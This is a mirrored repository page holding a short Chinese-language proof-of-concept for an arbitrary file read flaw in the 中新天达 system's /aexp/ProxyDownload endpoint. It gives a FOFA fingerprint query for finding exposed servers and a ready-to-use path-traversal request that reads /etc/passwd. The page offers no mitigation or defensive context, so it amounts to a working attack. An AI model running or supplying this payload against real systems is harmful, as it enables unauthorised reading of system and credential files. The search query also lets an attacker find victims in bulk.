admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-06 10:56:07 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/EDU/中新天达系统存在任意文件读取漏洞.md

17 lines
481 B
Markdown
Raw Normal View History

first commit
2025-03-04 23:12:57 +08:00
# 中新天达系统存在任意文件读取漏洞
中新天达系统`/aexp/ProxyDownload`存在任意文件读取漏洞,可能导致敏感信息泄露、数据盗窃及其他安全风险,从而对系统和用户造成严重危害。
## fofa
```haskell
body="aexp/ValidateImage"
```
## poc
```javascript
/aexp/ProxyDownload?path=/speedec/webapps/webftp/../../../../etc/passwd
```
![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409272013561.webp)
Reference in New Issue Copy Permalink